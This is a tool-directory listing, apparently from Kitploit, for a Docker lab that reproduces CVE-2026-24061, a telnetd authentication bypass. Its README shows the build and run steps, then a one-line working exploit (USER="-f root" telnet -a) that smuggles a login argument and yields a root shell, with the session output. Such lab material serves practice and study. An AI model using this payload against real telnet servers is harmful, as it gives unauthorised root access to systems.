Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/shivam-bathla/cve-2026-24061-setup
Authentication & AuthorizationPrivilege EscalationVulnerability AnalysisExploitationLabs & Practice
GitHubshivam-bathla/cve-2026-24061-setup

CVE-2026-24061-setup

Docker setup for CVE-2026-24061

View Repository
41457 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-24061 Setup

This repository contains the Docker setup for CVE-2026-24061.

Once you have installed Docker, just do the following:

  1. Clone this repository.

  2. Run the following command:

root@kitploit:~
sudo docker build . --tag telnetd-auth-bypass
  1. Once the docker image is built, we can start the container using the following command:
root@kitploit:~
sudo docker run -dt --rm --name test telnetd-auth-bypass
  1. Once that's done, you have your vulnerable lab setup ready to be pwned. Just send the payload and get the root shell :)
root@kitploit:~
kali@kali:~$ USER="-f root" telnet -a 172.17.0.2
Trying 172.17.0.2...
Connected to 172.17.0.2.
Escape character is '^]'.

Linux 6.12.25-amd64 (5321b63dbc56) (pts/1)

Welcome to Ubuntu 24.04.3 LTS (GNU/Linux 6.12.25-amd64 x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

root@5321b63dbc56:~# 

For more details, you can refer back to my post on the Telnet auth-bypass to root vulnerability.

Download Tool